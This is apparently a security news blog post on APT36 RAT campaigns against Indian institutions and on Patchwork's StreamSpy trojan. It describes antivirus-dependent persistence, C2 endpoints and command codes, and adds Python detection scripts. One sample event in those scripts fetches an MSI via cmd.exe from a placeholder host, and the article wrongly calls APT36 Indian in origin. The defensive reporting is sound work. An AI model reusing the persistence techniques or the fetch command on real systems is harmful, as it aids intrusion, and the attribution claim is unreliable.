New RAT Attacks Against the Indian Government and Academic Institutions by Transparent Tribe or APT36
A new wave of attacks against Indian governmental, academic, and strategic organizations using a remote access trojan (RAT) that gives them long-term control over infected hosts has been linked to the threat actor Transparent Tribe.
“The campaign uses fraudulent delivery techniques, involving a weaponized Windows shortcut (LNK) file posing as a legitimate PDF document and loaded with full PDF content to evade user suspicion,” CYFIRMA stated in its technical assessment.
The hacking group Transparent Tribe, commonly known as APT36, is well-known for launching cyberespionage operations against Indian businesses. The state-sponsored adversary, thought to be of Indian origin, has been operating since at least 2013.
To achieve its objectives, the threat actor has an ever-evolving arsenal of RATs. CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT are a few of the trojans that Transparent Tribe has used recently.
The most recent attacks begin with a spear-phishing email carrying a ZIP archive that contains an LNK file masquerading as a PDF. Opening the file triggers a remote HTML Application (HTA) script that uses “mshta.exe” to decrypt and load the final RAT payload straight into memory. To avoid raising the user’s suspicion, the HTA simultaneously downloads and opens a decoy PDF document.
“After decoding logic is set up, the HTA exploits ActiveX objects, especially WScript.Shell, to communicate with the Windows environment,” explained CYFIRMA. “This behavior exhibits environment profiling and runtime modification, guaranteeing compatibility with the intended system and improving execution reliability, techniques frequently observed in malware abusing ‘mshta.exe’.”
The malware’s capacity to modify its persistence strategy in response to the antivirus software installed on the compromised system is a notable feature:
- If Kaspersky is found, it establishes an operational directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and creates persistence by placing an LNK file in the Windows Startup folder, which then uses “mshta.exe” to start the HTA script.
- If Quick Heal is found, it creates a batch file and a malicious LNK file in the Windows Startup folder, writes the HTA payload to disk, and then uses the batch script to call it in order to establish persistence.
- If Avast, AVG, or Avira is found, it drops the payload straight into the Startup directory and runs it.
- If no recognized antivirus program is found, it combines payload placement, registry-based persistence, and batch-file execution before starting the batch script.
The second HTA file carries a DLL called “iinneldc.dll” that serves as a fully functional RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
“APT36 (Transparent Tribe) remains an exceedingly tenacious and strategically focused cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity firm stated.
APT36 has also been connected to another campaign in recent weeks that uses a malicious shortcut file that poses as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader. The loader then drops additional executables and malicious DLLs to establish long-term access, remote command execution, and system reconnaissance.

The shortcut is intended to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”) by executing an obfuscated command using cmd.exe. This command kicks off a sequence of operations:
- Extract a decoy PDF file and display it to the victim.
- Decode DLL files and write them to “C:\ProgramData\PcDirvs\wininet.dll” and “C:\ProgramData\PcDirvs\pdf.dll”.
- After 10 seconds, drop “PcDirvs.exe” to the same location and run it.
- Create “PcDirvs.hta” with Visual Basic Script to modify the registry and launch “PcDirvs.exe” each time the machine boots up, establishing persistence.
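The antivirus-dependent persistence chain described earlier and the MSI chain above leave the same kinds of host artifacts: mshta.exe launching an HTA, LNK or batch files dropped into a Startup folder, payloads written under the named staging directories, and a Run-key value. The following is an added triage example written for this article, not code from CYFIRMA or the report; the event field names and the sample telemetry are constructed, and the placeholder download host is invented.

```python
import re

# File names the report describes being dropped into a Startup folder
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.(lnk|bat|hta)$", re.I)
# Staging directories named for the two chains
STAGING_RE = re.compile(r"^c:\\(users\\public\\core|programdata\\pcdirvs)\\", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$", re.I)

def triage_event(ev):
    """Return the names of the suspicious patterns one event matches."""
    hits = []
    if ev["type"] == "process":
        image, cmd = ev["image"].lower(), ev["cmdline"].lower()
        if image.endswith("\\mshta.exe") and (".hta" in cmd or "://" in cmd):
            hits.append("mshta_hta_launch")      # HTA loader used by both chains
        if image.endswith("\\cmd.exe") and ".msi" in cmd and "://" in cmd:
            hits.append("cmd_remote_msi")        # shortcut fetching the MSI
    elif ev["type"] == "file":
        target = ev["target"].lower()
        if STARTUP_RE.search(target):
            hits.append("startup_folder_drop")
        if STAGING_RE.match(target):
            hits.append("staging_dir_write")
    elif ev["type"] == "registry":
        value = ev["value"].lower()              # Run value -> HTA or staging dir
        if RUN_KEY_RE.search(ev["key"]) and (".hta" in value or STAGING_RE.match(value)):
            hits.append("run_key_persistence")
    return hits

def triage(events):
    """Map event index to matched patterns, leaving clean events out."""
    results = {}
    for i, ev in enumerate(events):
        if hits := triage_event(ev):
            results[i] = hits
    return results

# Constructed telemetry: only the directory and file names come from the article
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\Public\core\update.hta"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start http://placeholder.invalid/nikmights.msi"},
    {"type": "file", "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                               r"\Start Menu\Programs\Startup\report.lnk"},
    {"type": "file", "target": r"C:\ProgramData\PcDirvs\wininet.dll"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": r"C:\ProgramData\PcDirvs\PcDirvs.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]
```

Feed real Sysmon process, file-create and registry events mapped to these fields; a single Run-key or Startup hit is weak on its own, but two or more of these patterns on one host in a short window is worth an investigation.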
The lure PDF is a legitimate advisory issued in 2024 by the National Cyber Emergency Response Team of Pakistan (PKCERT) about a fraudulent WhatsApp message campaign that targeted Pakistani government entities with a malicious WinRAR file that infected systems with malware.
The DLL “wininet.dll” reaches out to a hard-coded command-and-control (C2) server at dns.wmiprovider[.]com, a domain registered in mid-April 2025. Although the C2 is currently dormant, the Windows Registry-based persistence means the threat could reappear at any time in the future.
The following is a list of endpoints:
- /retsiger (register), to register the infected system with the C2 server
- /taebtraeh (heartbeat), to beacon its presence to the C2 server
- /dnammoc_teg (get_command), to run arbitrary commands via “cmd.exe”
- /dnammocmvitna (antivmcommand), to query or set an anti-VM status and likely adjust behavior
Additionally, the DLL enumerates the antivirus software installed on the victim system, making it a capable tool for reconnaissance and theft of private data.
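Each endpoint above is simply its command name spelled backwards, which makes the paths easy to hunt for in proxy logs. The following detection is an added example written for this article, not code from CYFIRMA; the log format and all log lines are constructed, and only the host and the four paths come from the report.

```python
import re
from urllib.parse import urlsplit

# The DLL's paths are its command names spelled backwards (/retsiger -> register)
C2_COMMANDS = {"register", "heartbeat", "get_command", "antivmcommand"}
C2_HOST = "dns.wmiprovider.com"  # the article's dns.wmiprovider[.]com, refanged for matching

# Simplified proxy log: timestamp client method url status (constructed format)
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

def decode_path(path):
    """Return the command a URL path encodes, or None if it is not a known one."""
    last = path.strip("/").split("/")[-1]
    name = last[::-1]
    return name if name in C2_COMMANDS else None

def scan_log(lines):
    """Flag requests whose path decodes to a C2 command or whose host is the known C2."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m["url"])
        command = decode_path(url.path)
        known_host = url.hostname == C2_HOST
        if command or known_host:
            alerts.append({"src": m["src"], "host": url.hostname, "path": url.path,
                           "command": command, "known_c2_host": known_host})
    return alerts

# Constructed log lines; only the host and the four paths come from the article
SAMPLE_LOG = """\
2025-04-20T10:00:01Z 10.0.0.12 POST http://dns.wmiprovider.com/retsiger 200
2025-04-20T10:05:01Z 10.0.0.12 GET http://dns.wmiprovider.com/taebtraeh 200
2025-04-20T10:05:03Z 10.0.0.12 GET http://dns.wmiprovider.com/dnammoc_teg 200
2025-04-20T10:05:04Z 10.0.0.12 GET http://dns.wmiprovider.com/dnammocmvitna 200
2025-04-20T10:06:00Z 10.0.0.7 GET http://www.example.com/index.html 200
2025-04-20T10:07:00Z 10.0.0.9 GET http://cdn.example.net/retsiger 404
""".splitlines()
```

A path-only hit on an unrelated host (the last sample line) is lower confidence than a hit on the known C2 host, so treat the `known_c2_host` flag as the severity discriminator when triaging results.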
Patchwork Linked to New StreamSpy Trojan
The revelation follows weeks after security researcher Idan Tarab connected Patchwork (also known as Dropping Elephant or Maha Grass), a hacking group thought to be of Indian descent, to attacks against Pakistan’s defense industry using a Python-based backdoor that is disseminated via phishing emails containing ZIP files.
The download contains an MSBuild project that, when run with “msbuild.exe,” installs and launches the Python RAT via a dropper. The malware has the ability to connect to a C2 server, execute instructions, upload and download data, and run remote Python modules.
“This campaign reflects a contemporary, highly encrypted Patchwork APT toolkit blending MSBuild LOLBin loaders, PyInstaller‑modified Python runtimes, marshalled bytecode implants, geofencing, randomized PHP C2 endpoints, [and] realistic persistence mechanisms,” Tarab stated.
As of December 2025, Patchwork has also been linked to StreamSpy, a previously unreported trojan that communicates with C2 via WebSocket and HTTP protocols. HTTP is utilized for file transfers, while the WebSocket channel is used to receive instructions and send the execution results.
According to QiAnXin, StreamSpy’s connections to Patchwork stem from its resemblance to Spyder, a variant of another backdoor called WarHawk that is attributed to SideWinder. Spyder has been used by Patchwork since 2023.
The malware (“Annexure.exe”), which is distributed via ZIP archives (“OPS-VII-SIR.zip”) hosted on “firebasescloudemail[.]com,” can gather system data, establish persistence via the Windows Registry, scheduled tasks, or an LNK file in the Startup folder, and interact with the C2 server via WebSocket and HTTP. The following is a list of supported commands:
- F1A5C3, to use ShellExecuteExW to download and open a file.
- B8C1D2, to configure the shell to execute commands.
- E4F5A6, to configure PowerShell as the shell for command execution.
- FL_SH1, to shut down every shell.
- C9E3D4, E7F8A9, H1K4R8, and C0V3RT to download, extract, and use ShellExecuteExW to open encrypted zip files from the C2 server.
- F2B3C4, to collect data regarding the device’s file system and all associated drives.
- D5E6F7, to upload and download files.
- A8B9C0, to upload files.
- D1E2F3, to delete a file.
- A4B5C6, to rename a file.
- D7E8F9, to list a certain folder.
According to QiAnXin, the StreamSpy download site also hosts Spyder variants with comprehensive data collection functionality. Additionally, the malware’s digital signature shows connections with ShadowAgent, another Windows RAT linked to the DoNot Team (also known as Brainworm). It’s interesting to note that in November 2025, 360 Threat Intelligence Center identified the identical “Annexure.exe” executable as ShadowAgent.
“The advent of the StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is continuously iterating its arsenal of attack tools,” the Chinese security company stated.
In order to avoid detection and HTTP traffic filtering, attackers try to employ WebSocket channels for command issuance and result reporting in the StreamSpy malware. Furthermore, the associated samples provide additional evidence that the Maha Grass and DoNot attack groups share some resources.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.